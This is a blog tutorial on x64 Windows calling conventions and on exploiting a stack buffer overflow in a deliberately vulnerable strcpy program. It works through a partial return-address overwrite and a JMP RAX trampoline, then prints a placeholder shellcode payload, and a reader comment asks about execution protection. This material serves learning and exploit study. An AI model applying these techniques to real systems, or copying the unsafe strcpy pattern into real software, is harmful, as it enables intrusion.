Stack Based Buffer Overflows on x64 (Windows)

The previous two blog posts describe how a Stack Based Buffer Overflow vulnerability works on x86 (32 bits) Windows. In the first part, you can find a short introduction to x86 Assembly and how the stack works, and on the second part you can understand this vulnerability and find out how to exploit it.

This article will present a similar approach in order to understand how it is possible to exploit this vulnerability on x64 (64 bits) Windows. First part will cover the differences in the Assembly code between x86 and x64 and the different function calling convention, and the second part will detail how these vulnerabilities can be exploited.

ASM for x64

There are multiple differences in Assembly that need to be understood in order to proceed. Here we will talk about the most important changes between x86 and x64 related to what we are going to do.

First of all, the registers are now the following:

  • The general purpose registers are the following: RAX, RBX, RCX, RDX, RSI, RDI, RBP and RSP. They are now 64 bit (8 bytes) instead of 32 bits (4 bytes).
  • The EAX, EBX, ECX, EDX, ESI, EDI, EBP, ESP represent the last 4 bytes of the previously mentioned registers. They hold 32 bits of data.
  • There are a few new registers: R8, R9, R10, R11, R12, R13, R14, R15, also holding 64 bits.
  • It is possible to use R8d, R9d etc. in order to access the last 4 bytes, as you can do it with EAX, EBX etc.
  • Pushing and poping data on the stack will use 64 bits instead of 32 bits

Calling convention

Another important difference is the way functions are called, the calling convention.

Here are the most important things we need to know:

  • First 4 parameters are not placed on the stack. First 4 parameters are specified in the RCX, RDX, R8 and R9 registers.
  • If there are more than 4 parameters, the other parameters are placed on the stack, from left to right.
  • Similar to x86, the return value will be available in the RAX register.
  • The function caller will allocate stack space for the arguments used in registers (called “shadow space” or “home space”). Even if when a function is called the parameters are placed in registers, if the called function needs to modify the registers, it will need some space to store them, and this space will be the stack. The function caller will have to allocate this space before the function call and to deallocate it after the function call. The function caller should allocate at least 32 bytes (for the 4 registers), even if they are not all used.
  • The stack has to be 16 bytes aligned. When a function is called, similar to x86, the return address (8 bytes) is placed on the stack. So, for example, if a function caller allocates 32 bytes on the stack, it will also place 8 bytes return address on the stack, resulting 40 bytes, which is not a 16 bytes alignment (a 16 multiple). In this case, the function caller will not allocate 32 bytes, it will allocate 40 bytes, which adding the 8 bytes return address, will result in 48 bytes, which is 16 bytes aligned.

Function calling example

Let’s take a simple example in order to understand those things. Below is a function that does a simple addition, and it is called from main.

#include "stdafx.h"

int Add(long x, int y)
{
    int z = x + y;
    return z;
}

int main()
{
    Add(3, 4);
    return 0;
}

Here is a possible output, after removing all optimisations and security features.

Main function:

sub rsp,28
mov edx,4
mov ecx,3
call <consolex64.Add>
xor eax,eax
add rsp,28
ret

We can see the following:

  1. sub rsp,28 – This will allocate 0x28 (40) bytes on the stack, as we previously discussed: 32 bytes for the register arguments and 8 bytes for alignment.
  2. mov edx,4 – This will place in EDX register the second parameter. Since the number is small, there is no need to use RDX, the result is the same.
  3. mov ecx,3 – The value of the first argument is place in ECX register.
  4. call <consolex64.Add> – Call the “Add” function.
  5. xor eax,eax – Set EAX (or RAX) to 0, as it will be the return value of main.
  6. add rsp,28 – Clears the allocated stack space.
  7. ret – Return from main.

Add function:

mov dword ptr ss:[rsp+10],edx
mov dword ptr ss:[rsp+8],ecx
sub rsp,18
mov eax,dword ptr ss:[rsp+28]
mov ecx,dword ptr ss:[rsp+20]
add ecx,eax
mov eax,ecx
mov dword ptr ss:[rsp],eax
mov eax,dword ptr ss:[rsp]
add rsp,18
ret

Let’s see how this function works:

  1. mov dword ptr ss:[rsp+10],edx – As we know, the arguments are passed in ECX and EDX registers. But what if the function needs to use those registers (however, please note that some registers must be preserved by a function call, these registers are the following: RBX, RBP, RDI, RSI, R12, R13, R14 and R15)? In this case, the function will use the “shadow space” (“home space”) allocated by the function caller. With this instruction, the function saves on the shadow space the second argument (the value 4), from EDX register.
  2. mov dword ptr ss:[rsp+8],ecx – Similar to the previous instruction, this one will save on the stack the first argument (value 3) from the ECX register
  3. sub rsp,18 – Allocate 0x18 (or 24) bytes on the stack. This function does not call other function, so it is not needed to allocate at least 32 bytes. Also, since it does not call other functions, it is not required to align the stack to 16 bytes. I am not sure why it allocates 24 bytes, it looks like the “local variables area” on the stack has to be aligned to 16 bytes and the other 8 bytes might be used for the stack alignment (as previously mentioned).
  4. mov eax,dword ptr ss:[rsp+28] – Will place in EAX register the value of the second parameter (value 4).
  5. mov ecx,dword ptr ss:[rsp+20] – Will place in ECX register the value of the first parameter (value 3).
  6. add ecx,eax – Will add to ECX the value of the EAX register, so ECX will become 7.
  7. mov eax,ecx – Will save the same value (the sum) into EAX register.
  8. mov dword ptr ss:[rsp],eax and mov eax,dword ptr ss:[rsp] look like they are some effects of the removed optimizations, they don’t do anything useful.
  9. add rsp,18 – Cleanup the allocated stack space.
  10. ret – Return from the function.

Exploitation

Let’s see now how it would be possible to exploit a Stack Based Buffer Overflow on x64. The idea is similar to x86: we overwrite the stack until we overwrite the return address. At that point we can control program execution. This is the easiest example to understand this vulnerability.

We will have a simple program, such as this one:

void Copy(const char *p)
{
    char buffer[40];
    strcpy(buffer, p);
}

int main()
{
    Copy("Test");
    return 0;
}

We have a 40 bytes buffer and a function that will copy some string on that buffer.

This will be the assembly code of the main function:

sub rsp,28                       ; Allocate space on the stack
lea rcx,qword ptr ds:[1400021F0] ; Put in RCX the string ("test")
call <consolex64.Copy>           ; Call the Copy function
xor eax,eax                      ; EAX = 0, return value
add rsp,28                       ; Cleanup the stack space
ret                              ; return

And this will be the assembly code for the Copy function:

mov qword ptr ss:[rsp+8],rcx  ; Save the RCX on the stack
sub rsp,58                    ; Allocate space on the stack
mov rdx,qword ptr ss:[rsp+60] ; Put in RDX the "Test" string (second parameter to strcpy)
lea rcx,qword ptr ss:[rsp+20] ; Put in RCX the buffer (first parameter to strcpy)
call <consolex64.strcpy>      ; Call strcpy function
add rsp,58                    ; Cleanup the stack
ret                           ; Return from function

Let’s modify the Copy function call to the following:

Copy("1111111122222222333333334444444455555555");

The string has 40 bytes, and it will fit in our buffer (however, please not that strcpy will also place a NULL byte after our string, but this way it is easier to see the buffer on the stack).

This is how the stack will look like after the strcpy function call:

000000000012FE90 000007FEEE7E5D98 ; Unused stack space
000000000012FE98 00000001400021C8 ; Unused stack space
000000000012FEA0 0000000000000000 ; Unused stack space
000000000012FEA8 00000001400021C8 ; Unused stack space
000000000012FEB0 3131313131313131 ; "11111111"
000000000012FEB8 3232323232323232 ; "22222222"
000000000012FEC0 3333333333333333 ; "33333333"
000000000012FEC8 3434343434343434 ; "44444444"
000000000012FED0 3535353535353535 ; "55555555"
000000000012FED8 0000000000000000 ; Unused stack space
000000000012FEE0 00000001400021A0 ; Unused stack space
000000000012FEE8 0000000140001030 ; Return address

As you can probably see, we need to add extra 24 bytes to overwrite the return address: 16 bytes the unused stack space and 8 bytes for the return address. Let’s modify the Copy function call to the following:

Copy("11111111222222223333333344444444555555556666666677777777AAAAAAAA");

This will overwrite the return address with “AAAAAAAA”.

NULL byte problem

In our case, a call to “strcpy” function will generate the vulnerability. What is important to understand, is that “strcpy” function will stop copying data when it will encounter first NULL byte. For us, this means that we cannot have NULL bytes in our payload.

This is a problem for a simple reason: the addresses that we might use contain NULL bytes. For example, these are the addresses in my case:

0000000140001000 | 48 89 4C 24 08 | mov qword ptr ss:[rsp+8],rcx 
0000000140001005 | 48 83 EC 58    | sub rsp,58 
0000000140001009 | 48 8B 54 24 60 | mov rdx,qword ptr ss:[rsp+60] 
000000014000100E | 48 8D 4C 24 20 | lea rcx,qword ptr ss:[rsp+20] 
0000000140001013 | E8 04 0B 00 00 | call <consolex64.strcpy>
0000000140001018 | 48 83 C4 58    | add rsp,58 
000000014000101C | C3             | ret

If we would like to proceed like in the 32 bits example, we would have to overwrite the return address to an address such as 000000014000101C where there would be a “JMP RSP” instruction, and continue with our shellcode after this address. As you can see, this is not possible, because the address contains NULL bytes.

So, what can we do? We should find a workaround. A simple and useful trick that we can do is the following: we can partially overwrite the return address. So, instead of overwriting the whole 8 bytes of the address, we can overwrite only the last 4, 5 or 6 bytes. Let’s modify the function call to overwrite only the last 5 bytes, so we will just remove 3 “A”s from our payload. The function call will be the following:

Copy("11111111222222223333333344444444555555556666666677777777AAAAA");

Before the “RET” instruction, the stack will look like this:

000000000012FED8 3636363636363636 ; Part of our payload
000000000012FEE0 3737373737373737 ; Part of our payload
000000000012FEE8 0000004141414141 ; Return address

As you can see, we are able to specify a valid address, so we solved our first issue. However, since we cannot add anything else after this, as we need NULL bytes to have a valid address, how can we exploit this vulnerability?

Let’s take a look at the registers, maybe we can find an easy win. Here are the registers before the RET instruction:

Win64 registers

We can see that in the RAX register we can find the address where our payload is stored. This happens for a simple reason: strcpy function will copy the string to the buffer and it will return the address of the buffer. As we already know, the returned data from a function call will be saved in RAX register, so we will have access to our payload using RAX register.

Now, our exploitation is simple:

  1. We have our payload address in RAX register
  2. We find a “JMP RAX” instruction
  3. We specify the address of that instruction as return address

We can easily find some “JMP RAX” instructions:

JMP RAX

We will take one of them, one that does not contain NULL bytes in the middle, and we can create the payload:

  1. 56 bytes of shellcode (required to reach the return address). We will use 0xCC (the INT 3 instruction, which is used to pause the execution of the program in the debugger)
  2. 4 bytes of return address, the “JMP RAX” instruction that we previously found

This is how the function call will look like:

 Copy("\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC"
      "\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC"
      "\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC"
      "\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC"
      "\xF8\x0E\x7E\x77");

And we have control over the program.

However, please note that we have a small buffer and it might be difficult to find a good shellcode to fit in this space. However, the purpose of the article was to find some way to exploit this vulnerability in a way that can be easily understood.

Conclusion

Maybe this article did not cover a real-life situation, but it should be enough as a starting point in exploiting Stack Based Buffer Overflows on Windows 64 bits.

My recommendation is to compile yourself a program like this one and try to exploit it yourself. You can download my simple Visual Studio 2017 project from here.

If you have any questions, please leave a comment here and use the contact email.

2 thoughts on “Stack Based Buffer Overflows on x64 (Windows)

  1. Lewis

    Nice article! I tried to replicate your example to understand the technique but unfortunately the shellcode is not being executed after RET.
    In x64Dbg i get “EXCEPTION_ACCESS_VIOLATION” at the first instruction of the shellcode. I am pretty sure that this happen because the stack page is market as RW and miss the Executable flag. I am facing Executable space protection? How to deal with that in this case?

    Thanks for your time, i really appreaciate it.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

w

Connecting to %s